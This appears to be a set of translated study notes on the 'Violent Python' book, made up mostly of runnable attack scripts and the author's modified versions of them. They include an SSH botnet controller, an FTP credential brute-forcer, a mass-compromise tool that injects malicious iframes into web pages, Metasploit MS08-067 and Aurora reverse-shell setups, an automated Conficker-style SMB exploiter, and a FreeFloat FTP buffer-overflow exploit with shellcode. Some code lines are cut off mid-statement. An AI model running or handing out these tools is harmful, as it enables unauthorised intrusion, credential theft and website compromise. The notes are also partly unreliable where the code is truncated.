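This code defines a client class that handles the SSH connection and sends commands, a botNet list that holds every host in the botnet, and two functions: addClient() to add a host and botnetCommand() to run a command on every host in turn.

Output: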





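[My modified code]

Next is my modified version. The hosts' details are stored in a file, with the three fields separated by colons, so the script can read the host information from the file. The script also works as a batch interactive shell, much like the earlier modified SSH shell, except that each command typed is executed on every host and the results are returned:

The botnet.txt file:

botNet2.py: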

#!/usr/bin/python

#coding=utf-8

import optparse

from pexpect import pxssh

botNet=[]

#List of hosts already added, used to check whether the current host is already in botNet

hosts = []

#Define a client class

class Client(object):

"""docstring for Client"""

def __init__(self, host, user, password):

self.host = host

self.user = user

self.password = password

self.session = self.connect()

def connect(self):

try:

s = pxssh.pxssh()

s.login(self.host,self.user,self.password)

return s

except Exception, e:

print e

print '[-] Error Connecting'

def send_command(self, cmd):

self.session.sendline(cmd)

self.session.prompt()

return self.session.before

def botnetCommand(cmd, k):

for client in botNet:

output=client.send_command(cmd)

#Print only when k is True (the call made after the last host was added); otherwise output would be repeated

if k:

print '[*] Output from '+client.host

print '[+] '+output+'\n'

def addClient(host,user,password):

if len(hosts) == 0:

hosts.append(host)

client=Client(host,user,password)

botNet.append(client)

else:

t = True

#Check whether host is already in the hosts list; add it only if it is not

for h in hosts:

if h == host:

t = False

if t:

hosts.append(host)

client=Client(host,user,password)

botNet.append(client)

def main():

parser=optparse.OptionParser('Usage : ./botNet.py -f <botNet file>')

parser.add_option('-f',dest='file',type='string',help='specify botNet file')

(options,args)=parser.parse_args()

file = options.file

if file==None:

print parser.usage

exit(0)

#Count the lines in the file; this must use a separate open() from f below, otherwise it fails

count = len(open(file,'r').readlines())

while True:

cmd=raw_input(" ")

k = 0

f = open(file,'r')

for line in f.readlines():

line = line.strip('\n')

host = line.split(':')[0]

user = line.split(':')[1]

password = line.split(':')[2]

k += 1

#Check whether this is the last host, because the command output accumulates the earlier results and would otherwise be printed repeatedly

if k < count:

addClient(host,user,password)

#Not the last host: do not print the command output yet

botnetCommand(cmd,False)

else:

addClient(host,user,password)

#Last host: print the command output

botnetCommand(cmd,True)

if __name__ =='__main__':

main()

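The main problem this modified version handles is the output, which the code comments already explain.

Output:

Collected SSH hosts can all be saved in botnet.txt, which makes the script convenient to run and enables batch operation.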



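3. Mass-Compromising Hosts via FTP and the Web

Building an Anonymous FTP Scanner with Python

Some FTP servers allow anonymous login because it helps sites provide access to software updates. In that case the user logs in with the user name "anonymous" and submits an email address in place of a password.

The code below uses the FTP(), login(), and quit() methods of the ftplib module: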

#!/usr/bin/python
#coding=utf-8
import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous','[email protected]')
        print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception, e:
        print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
        return False

hostname = '10.10.10.128'
anonLogin(hostname)

Output:



[My modified code]

A small modification to take the host name interactively:

#!/usr/bin/python

#coding=utf-8

import ftplib

def anonLogin(hostname):

try:

ftp=ftplib.FTP(hostname)

ftp.login('anonymous','what')

print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'

ftp.quit()

return True

except Exception,e:

print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'

def main():

while True:

hostname = raw_input("Please enter the hostname: ")

anonLogin(hostname)

print

if __name__ == '__main__':

main()

Output:

Brute-Forcing FTP User Credentials with ftplib

Again using the ftplib module, combined with reading a file of credentials, to brute-force FTP logins:

#!/usr/bin/python

#coding=utf-8

import ftplib

def bruteLogin(hostname,passwdFile):

pF = open(passwdFile,'r')

for line in pF.readlines():

username = line.split(':')[0]

password = line.split(':')[1].strip('\r').strip('\n')

print '[+] Trying: ' + username + '/' + password

try:

ftp = ftplib.FTP(hostname)

ftp.login(username,password)

print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password

ftp.quit()

return (username,password)

except Exception, e:

pass

print '\n[-] Could not brute force FTP credentials.'

return (None,None)

host = '10.10.10.128'

passwdFile = 'ftpBL.txt'

bruteLogin(host,passwdFile)



Output:



The ftpBL.txt file:



[My modified code]

A small change:

#!/usr/bin/python

import ftplib

def bruteLogin(hostname,passwdFile):

pF=open(passwdFile,'r')

for line in pF.readlines():

username=line.split(':')[0]

password=line.split(':')[1].strip('\r').strip('\n')

print '[+] Trying: '+username+"/"+password

try:

ftp=ftplib.FTP(hostname)

ftp.login(username,password)

print '\n[*] '+str(hostname)+' FTP Logon Succeeded: '+username+"/"+password

return (username,password)

except Exception,e:

pass

print '\n[-] Could not brute force FTP credentials.'

return (None,None)

def main():

while True:

h=raw_input("[*] Please enter the hostname: ")

f=raw_input("[*] Please enter the filename: ")

bruteLogin(h,f)

print

if __name__ == '__main__':

main()

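Output:

Searching for Web Pages on the FTP Server

With FTP credentials in hand, you can test whether the server also serves web content: check whether each file name returned by nlst() looks like a default web page, and add every match to the retList list: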
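The file-name test is plain string matching, so it can be tried on a hand-written list instead of a live nlst() result. In this Python 3 sketch, `find_default_pages` and the sample listing are made up for illustration.

```python
def find_default_pages(file_names):
    """Return the names that contain .php, .asp, or .htm, ignoring case."""
    markers = (".php", ".asp", ".htm")
    return [name for name in file_names
            if any(marker in name.lower() for marker in markers)]

# Hand-written stand-in for a directory listing.
listing = ["INDEX.HTML", "readme.txt", "login.php", "Default.aspx", "logo.png"]
pages = find_default_pages(listing)
print(pages)
```

Because the test is a substring match, ".htm" also covers ".html" and ".asp" also covers ".aspx".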

#!/usr/bin/python

#coding=utf-8

import ftplib

def returnDefault(ftp):

try:

#nlst() lists the files in the directory

dirList = ftp.nlst()

except:

dirList = []

print '[-] Could not list directory contents.'

print '[-] Skipping To Next Target.'

return

retList = []

for filename in dirList:

#lower() converts the file name to lower case

fn = filename.lower()

if '.php' in fn or '.asp' in fn or '.htm' in fn:

print '[+] Found default page: '+filename

retList.append(filename)

return retList

host = '10.10.10.130'

username = 'ftpuser'

password = 'ftppassword'

ftp = ftplib.FTP(host)

ftp.login(username,password)

returnDefault(ftp)





Output:

[My modified code]

#!/usr/bin/python

#coding=utf-8

import ftplib

def returnDefault(ftp):

try:

#nlst() lists the files in the directory

dirList = ftp.nlst()

except:

dirList = []

print '[-] Could not list directory contents.'

print '[-] Skipping To Next Target.'

return

retList=[]

for fileName in dirList:

#lower() converts the file name to lower case

fn = fileName.lower()

if '.php' in fn or '.htm' in fn or '.asp' in fn:

print '[+] Found default page: ' + fileName

retList.append(fileName)

if len(retList) == 0:

print '[-] No default pages found.'

print '[-] Skipping To Next Target.'

return retList

def main():

while True:

host = raw_input('[*]Host >>> ')

username = raw_input('[*]Username >>> ')

password = raw_input('[*]Password >>> ')

try:

ftp = ftplib.FTP(host)

ftp.login(username,password)

returnDefault(ftp)

except:

print '[-] Logon failed.'

print

if __name__ == '__main__':

main()

Output:

Injecting Malicious Code into Web Pages



This section uses the older Aurora vulnerability. Open the Metasploit console on Kali and enter:

search ms10_002_aurora

use exploit/windows/browser/ms10_002_aurora

show payloads

set payload windows/shell/reverse_tcp

show options

set SRVHOST 10.10.10.160

set URIPATH /exploit

set LHOST 10.10.10.160

set LPORT 443

exploit

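After running it, I visited http://10.10.10.160:8080/exploit from Windows Server 2003 and from XP. The connection was logged but no shell was obtained, probably because the installed IE version is not affected by the Aurora vulnerability:

With the process clear, what remains is to inject code that loads http://10.10.10.160:8080/exploit into a web page file on the target server. The full code: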

#!/usr/bin/python

#coding=utf-8

import ftplib

def injectPage(ftp,page,redirect):

f = open(page + '.tmp','w')

#Download the file over FTP

ftp.retrlines('RETR ' + page,f.write)

print '[+] Downloaded Page: ' + page

f.write(redirect)

f.close()

print '[+] Injected Malicious IFrame on: ' + page

#Upload the modified file

ftp.storlines('STOR ' + page,open(page + '.tmp'))

print '[+] Uploaded Injected Page: ' + page

host = '10.10.10.130'

username = 'ftpuser'

password = 'ftppassword'

ftp = ftplib.FTP(host)

ftp.login(username,password)

redirect = ''

injectPage(ftp,'index.html',redirect)



Output:



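Download, injection, and upload all report success; checking the file on the server confirms that the injection worked:

From here exploitation proceeds as at the start of this section: open msf and set up the listener.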



[My modified code]

#!/usr/bin/python

#coding=utf-8

import ftplib

def injectPage(ftp,page,redirect):

f = open(page + '.tmp','w')

#Download the file over FTP

ftp.retrlines('RETR ' + page,f.write)

print '[+] Downloaded Page: ' + page

f.write(redirect)

f.close()

print '[+] Injected Malicious IFrame on: ' + page

#Upload the modified file

ftp.storlines('STOR ' + page,open(page + '.tmp'))

print '[+] Uploaded Injected Page: ' + page

print

def main():

while True:

host = raw_input('[*]Host >>> ')

username = raw_input('[*]Username >>> ')

password = raw_input('[*]Password >>> ')

redirect = raw_input('[*]Redirect >>> ')

print

try:

ftp = ftplib.FTP(host)

ftp.login(username,password)

injectPage(ftp,'index.html',redirect)

except:

print '[-] Logon failed.'

if __name__ == '__main__':

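main()

Output:

Integrating the Whole Attack

This combines the code from the previous subsections. The main addition is attack(), which logs in to the FTP server with a user name and password, then calls the other functions to find default pages, download them, inject them, and upload them. In short, it wires together the functions from the earlier subsections.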

#!/usr/bin/python

#coding=utf-8

import ftplib

import optparse

import time

def attack(username,password,tgtHost,redirect):

ftp = ftplib.FTP(tgtHost)

ftp.login(username,password)

defPages = returnDefault(ftp)

for defPage in defPages:

injectPage(ftp,defPage,redirect)

def anonLogin(hostname):

try:

ftp = ftplib.FTP(hostname)

ftp.login('anonymous','[email protected]')

print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'

ftp.quit()

return True

except Exception, e:

print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'

return False

def bruteLogin(hostname,passwdFile):

pF = open(passwdFile,'r')

for line in pF.readlines():

username = line.split(':')[0]

password = line.split(':')[1].strip('\r').strip('\n')

print '[+] Trying: ' + username + '/' + password

try:

ftp = ftplib.FTP(hostname)

ftp.login(username,password)

print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password

ftp.quit()

return (username,password)

except Exception, e:

pass

print '\n[-] Could not brute force FTP credentials.'

return (None,None)

def returnDefault(ftp):

try:

#nlst() lists the files in the directory

dirList = ftp.nlst()

except:

dirList = []

print '[-] Could not list directory contents.'

print '[-] Skipping To Next Target.'

return []

retList = []

for filename in dirList:

#lower() converts the file name to lower case

fn = filename.lower()

if '.php' in fn or '.asp' in fn or '.htm' in fn:

print '[+] Found default page: '+filename

retList.append(filename)

return retList

def injectPage(ftp,page,redirect):

f = open(page + '.tmp','w')

#Download the file over FTP

ftp.retrlines('RETR ' + page,f.write)

print '[+] Downloaded Page: ' + page

f.write(redirect)

f.close()

print '[+] Injected Malicious IFrame on: ' + page

#Upload the modified file

ftp.storlines('STOR ' + page,open(page + '.tmp'))

print '[+] Uploaded Injected Page: ' + page

def main():

parser = optparse.OptionParser('[*] Usage : ./massCompromise.py -H <target host[s]> -r <redirect page> [-f <userpass file>]')

parser.add_option('-H',dest='hosts',type='string',help='specify target host')

parser.add_option('-r',dest='redirect',type='string',help='specify redirect page')

parser.add_option('-f',dest='file',type='string',help='specify userpass file')

(options,args) = parser.parse_args()

#Build the list of hosts; without split() this would be a single string

hosts = str(options.hosts).split(',')

redirect = options.redirect

file = options.file

#No need to check for the credentials file yet, because anonymous login is tried first

if options.hosts == None or redirect == None:

print parser.usage

exit(0)

for host in hosts:

username = None

password = None

if anonLogin(host) == True:

username = 'anonymous'

password = '[email protected]'

print '[+] Using Anonymous Creds to attack'

attack(username,password,host,redirect)

elif file != None:

(username,password) = bruteLogin(host,file)

if password != None:

print '[+] Using Cred: ' + username + '/' + password + ' to attack'

attack(username,password,host,redirect)

if __name__ == '__main__':

main()



Result:

Because anonymous login is allowed, the injection can be carried out directly.



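[Personally modified code]

However, the files visible after an anonymous login belong only to the anonymous user; the files of ftpuser, the regular FTP user, are not among them. To inject into both sets of files in one run, I modified the code slightly: the elif in main() becomes an if, so the credential branch also runs after a successful anonymous login.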

#!/usr/bin/python

#coding=utf-8

import ftplib

import optparse

import time

def attack(username,password,tgtHost,redirect):

ftp = ftplib.FTP(tgtHost)

ftp.login(username,password)

defPages = returnDefault(ftp)

for defPage in defPages:

injectPage(ftp,defPage,redirect)

def anonLogin(hostname):

try:

ftp = ftplib.FTP(hostname)

ftp.login('anonymous','[email protected]')

print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'

ftp.quit()

return True

except Exception, e:

print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'

return False

def bruteLogin(hostname,passwdFile):

pF = open(passwdFile,'r')

for line in pF.readlines():

username = line.split(':')[0]

password = line.split(':')[1].strip('\r').strip('\n')

print '[+] Trying: ' + username + '/' + password

try:

ftp = ftplib.FTP(hostname)

ftp.login(username,password)

print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password

ftp.quit()

return (username,password)

except Exception, e:

pass

print '\n[-] Could not brute force FTP credentials.'

return (None,None)

def returnDefault(ftp):

try:

# nlst() returns the list of files in the current directory

dirList = ftp.nlst()

except:

dirList = []

print '[-] Could not list directory contents.'

print '[-] Skipping To Next Target.'

return

retList = []

for filename in dirList:

# lower() converts the file name to lowercase

fn = filename.lower()

if '.php' in fn or '.asp' in fn or '.htm' in fn:

print '[+] Found default page: '+filename

retList.append(filename)

return retList

def injectPage(ftp,page,redirect):

f = open(page + '.tmp','w')

# Download the page from the FTP server

ftp.retrlines('RETR ' + page,f.write)

print '[+] Downloaded Page: ' + page

f.write(redirect)

f.close()

print '[+] Injected Malicious IFrame on: ' + page

# Upload the modified page back to the server

ftp.storlines('STOR ' + page,open(page + '.tmp'))

print '[+] Uploaded Injected Page: ' + page

def main():

parser = optparse.OptionParser('[*] Usage : ./massCompromise.py -H <target host[s]> -r <redirect page> [-f <userpass file>]')

parser.add_option('-H',dest='hosts',type='string',help='specify target host')

parser.add_option('-r',dest='redirect',type='string',help='specify redirect page')

parser.add_option('-f',dest='file',type='string',help='specify userpass file')

(options,args) = parser.parse_args()

# split(',') turns the comma-separated -H value into a list of hosts; without it, hosts would be a single string

hosts = str(options.hosts).split(',')

redirect = options.redirect

file = options.file

# The userpass file is not checked here because an anonymous login is attempted first

if options.hosts == None or redirect == None:

print parser.usage

exit(0)

for host in hosts:

username = None

password = None

if anonLogin(host) == True:

username = 'anonymous'

password = '[email protected]'

print '[+] Using Anonymous Creds to attack'

attack(username,password,host,redirect)

if file != None:

(username,password) = bruteLogin(host,file)

if password != None:

print '[+] Using Cred: ' + username + '/' + password + ' to attack'

attack(username,password,host,redirect)

if __name__ == '__main__':

main()

Result:

The two users see different sets of files.

4. Conficker: Why Trying Hard Is Always Good Enough

Eleven passwords worth having in any password-attack list:

aaa

academia

anything

coffee

computer

cookie

oracle

password

secret

super

unknown



Attacking the Windows SMB Service with Metasploit

The MS08-067 vulnerability is used here for the demonstration.



Save the following commands as conficker.rc:

use exploit/windows/smb/ms08_067_netapi

set RHOST 10.10.10.123

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 10.10.10.160

set LPORT 7777

exploit -j -z

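Here the -j option of the exploit command runs the attack in the background as a job, and -z means that the session is not interacted with once the attack completes.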



Then run: msfconsole -r conficker.rc





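Once session 1 has been obtained, open it:

In this way msfconsole reads its commands from the file and carries out the corresponding operations, yielding a shell on the XP host.

Writing Python to Interact with Metasploit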



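The script imports the nmap library. findTgts() scans TCP port 445 on every host in the subnet, setupHandler() sets up the listener that receives the remote connection once a target has been exploited, and confickerExploit() writes the same commands as the conficker.rc script from the previous subsection: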

#!/usr/bin/python

#coding=utf-8

import nmap

def findTgts(subNet):

nmScan = nmap.PortScanner()

nmScan.scan(subNet,'445')

tgtHosts = []

for host in nmScan.all_hosts():

# If the scan result for the host includes TCP port 445

if nmScan[host].has_tcp(445):

state = nmScan[host]['tcp'][445]['state']

# and port 445 is open

if state == 'open':

print '[+] Found Target Host: ' + host

tgtHosts.append(host)

return tgtHosts

def setupHandler(configFile,lhost,lport):

configFile.write('use exploit/multi/handler\n')

configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')

configFile.write('set LPORT ' + str(lport) + '\n')

configFile.write('set LHOST ' + lhost + '\n')

configFile.write('exploit -j -z\n')

# Set the global variable DisablePayloadHandler so that, once this listener exists, later exploits do not start listeners of their own

# setg sets a global option

configFile.write('setg DisablePayloadHandler 1\n')

def confickerExploit(configFile,tgtHost,lhost,lport):

configFile.write('use exploit/windows/smb/ms08_067_netapi\n')

configFile.write('set RHOST ' + str(tgtHost) + '\n')

configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')

configFile.write('set LPORT ' + str(lport) + '\n')

configFile.write('set LHOST ' + lhost + '\n')

# -j runs the attack in the background as a job; -z means do not interact with the session afterwards

configFile.write('exploit -j -z\n')

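Note that confickerExploit() tells Metasploit to run the exploit in the context of a job (-j) and without interacting with the session immediately (-z). Because the script works in bulk and targets multiple hosts, it cannot interact with every host at once, so both -j and -z are required.

Brute-Forcing Credentials to Execute a Remote Process

Here the SMB username/password is brute-forced in order to gain the access needed to run a process remotely on the target (psexec). The username is set to Administrator and the password list file is opened; for each password in the file, the Metasploit commands for a remote process execution are written to the resource file. If a password is correct, a command shell is returned: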

def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):

username = 'Administrator'

pF = open(passwdFile,'r')

for password in pF.readlines():

password = password.strip('\n').strip('\r')

configFile.write('use exploit/windows/smb/psexec\n')

configFile.write('set SMBUser ' + str(username) + '\n')

configFile.write('set SMBPass ' + str(password) + '\n')

configFile.write('set RHOST ' + str(tgtHost) + '\n')

configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')

configFile.write('set LPORT ' + str(lport) + '\n')

configFile.write('set LHOST ' + lhost + '\n')

configFile.write('exploit -j -z\n')

Putting It All Together to Build Our Own Conficker

#!/usr/bin/python

#coding=utf-8

import nmap

import os

import optparse

import sys

def findTgts(subNet):

nmScan = nmap.PortScanner()

nmScan.scan(subNet,'445')

tgtHosts = []

for host in nmScan.all_hosts():

# If the scan result for the host includes TCP port 445

if nmScan[host].has_tcp(445):

state = nmScan[host]['tcp'][445]['state']

# and port 445 is open

if state == 'open':

print '[+] Found Target Host: ' + host

tgtHosts.append(host)

return tgtHosts

def setupHandler(configFile,lhost,lport):

configFile.write('use exploit/multi/handler\n')

configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')

configFile.write('set LPORT ' + str(lport) + '\n')

configFile.write('set LHOST ' + lhost + '\n')

configFile.write('exploit -j -z\n')

# Set the global variable DisablePayloadHandler so that, once this listener exists, later exploits do not start listeners of their own

# setg sets a global option

configFile.write('setg DisablePayloadHandler 1\n')

def confickerExploit(configFile,tgtHost,lhost,lport):

configFile.write('use exploit/windows/smb/ms08_067_netapi\n')

configFile.write('set RHOST ' + str(tgtHost) + '\n')

configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')

configFile.write('set LPORT ' + str(lport) + '\n')

configFile.write('set LHOST ' + lhost + '\n')

# -j runs the attack in the background as a job; -z means do not interact with the session afterwards

configFile.write('exploit -j -z\n')

def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):

username = 'Administrator'

pF = open(passwdFile,'r')

for password in pF.readlines():

password = password.strip('\n').strip('\r')

configFile.write('use exploit/windows/smb/psexec\n')

configFile.write('set SMBUser ' + str(username) + '\n')

configFile.write('set SMBPass ' + str(password) + '\n')

configFile.write('set RHOST ' + str(tgtHost) + '\n')

configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')

configFile.write('set LPORT ' + str(lport) + '\n')

configFile.write('set LHOST ' + lhost + '\n')

configFile.write('exploit -j -z\n')

def main():

configFile = open('meta.rc','w')

parser = optparse.OptionParser('[*] Usage : ./conficker.py -H -l [-p -F ]')

parser.add_option('-H',dest='tgtHost',type='string',help='specify the target host[s]')

parser.add_option('-l',dest='lhost',type='string',help='specify the listen host')

parser.add_option('-p',dest='lport',type='string',help='specify the listen port')

parser.add_option('-F',dest='passwdFile',type='string',help='specify the password file')

(options,args)=parser.parse_args()

if options.tgtHost == None or options.lhost == None:

print parser.usage

exit(0)

lhost = options.lhost

lport = options.lport

if lport == None:

lport = '1337'

passwdFile = options.passwdFile

tgtHosts = findTgts(options.tgtHost)

setupHandler(configFile,lhost,lport)

for tgtHost in tgtHosts:

confickerExploit(configFile,tgtHost,lhost,lport)

if passwdFile != None:

smbBrute(configFile,tgtHost,passwdFile,lhost,lport)

configFile.close()

os.system('msfconsole -r meta.rc')

if __name__ == '__main__':

main()

Result:

5. Writing Your Own Zero-Day Proof-of-Concept Code

Adding the key elements of the attack:



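First, the shellcode variable holds the hex-encoded payload generated by the Metasploit framework. The overflow variable holds 246 copies of the letter A (hex \x41). The ret variable points to an address in kernel32.dll that contains an instruction jumping straight to the top of the stack. The padding variable holds 150 NOP instructions, forming a NOP sled. Finally, all of these variables are concatenated into the crash variable: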

#!/usr/bin/python

#coding=utf-8

shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"

"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"

"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"

"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"

"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"

"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"

"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"

"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"

"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"

"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"

"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"

"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"

"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"

"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"

"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"

"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"

"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"

"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"

"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"

"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"

"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"

"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"

"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"

"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"

"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"

"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"

"\xba\x1e\x53\x31")

overflow = "\x41" * 246

ret = struct.pack('

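The padding is a run of NOP (no-operation) instructions placed before the shellcode. It relaxes the precision the attacker needs when estimating the address to jump to: landing anywhere in the NOP sled slides execution straight into the shellcode.

Sending the exploit:

A socket connects to TCP port 21 on the target host. If the connection succeeds, the script logs in anonymously and then sends the FTP RETR command followed by the crash variable. Because the affected program does not validate user input correctly, this triggers a stack-based buffer overflow that overwrites the EIP register, so the program jumps directly into the shellcode and executes it: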

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

s.connect((target, 21))

except:

print "[-] Connection to " + target + " failed!"

sys.exit(0)

print "[*] Sending " + str(len(crash)) + " " + command + " byte crash..."

s.send("USER anonymous\r\n")

s.recv(1024)

s.send("PASS \r\n")

s.recv(1024)

s.send("RETR" + " " + crash + "\r\n")

time.sleep(4)

Putting it together into the complete exploit script:

FreeFloat FTP, which runs on XP, needs to be downloaded before testing:

#!/usr/bin/python

#coding=utf-8

import socket

import sys

import time

import struct

if len(sys.argv) < 2:

print "[-] Usage: %s " % sys.argv[0] + "\r"

print "[-] For example [filename.py 192.168.1.10 PWND] would do the trick."

print "[-] Other options: AUTH, APPE, ALLO, ACCT"

sys.exit(0)

target = sys.argv[1]

command = sys.argv[2]

if len(sys.argv) > 2:

platform = sys.argv[2]

#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "\x00\xff\x0d\x0a\x3d\x20"

#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"

"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"

"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"

"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"

"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"

"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"

"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"

"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"

"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"

"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"

"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"

"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"

"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"

"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"

"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"

"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"

"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"

"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"

"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"

"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"

"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"

"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"

"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"

"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"

"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"

"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"

"\xba\x1e\x53\x31")

#7C874413 FFE4 JMP ESP kernel32.dll

overflow = "\x41" * 246

ret = struct.pack('

Chapter 3: Forensic Investigations with Python



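1. Where Have You Been? Analysis of Wireless Access Points in the Registry:

Open cmd with administrator privileges and run the following command; for each network it lists the profile GUID, the network description, the network name, and the gateway MAC address: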

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\

CurrentVersion\NetworkList\Signatures\Unmanaged" /s

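Using WinReg to read the Windows registry:

This requires Python's _winreg library, which is included by default in Python for Windows.

After connecting to the registry, OpenKey() opens the relevant key. The loop then walks through every network profile stored under that key and prints two of its values: FirstNetwork (the network name) and the MAC address of the default gateway.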

#!/usr/bin/python

#coding=utf-8

from _winreg import *

# Convert a REG_BINARY value into a readable MAC address

def val2addr(val):

addr = ""

for ch in val:

addr += ("%02x " % ord(ch))

addr = addr.strip(" ").replace(" ", ":")[0:17]

return addr

# Print information about the networks

def printNets():

net = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"

key = OpenKey(HKEY_LOCAL_MACHINE, net)

print "\n[*]Networks You have Joined."

for i in range(100):

try:

guid = EnumKey(key, i)

netKey = OpenKey(key, str(guid))

(n, addr, t) = EnumValue(netKey, 5)

(n, name, t) = EnumValue(netKey, 4)

macAddr = val2addr(addr)

netName = name

print '[+] ' + netName + ' ' + macAddr

CloseKey(netKey)

except:

break

def main():

printNets()

if __name__ == '__main__':

main()



Result:

Note that the script only works when it is run from a cmd window opened with administrator privileges.
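The byte-to-MAC conversion in val2addr() can be checked without touching the registry. The following is a minimal sketch, assuming Python 3 (the listings in these notes target Python 2) and a made-up six-byte value; it is an illustration of the same formatting step, not the book's code.

```python
def val2addr(val):
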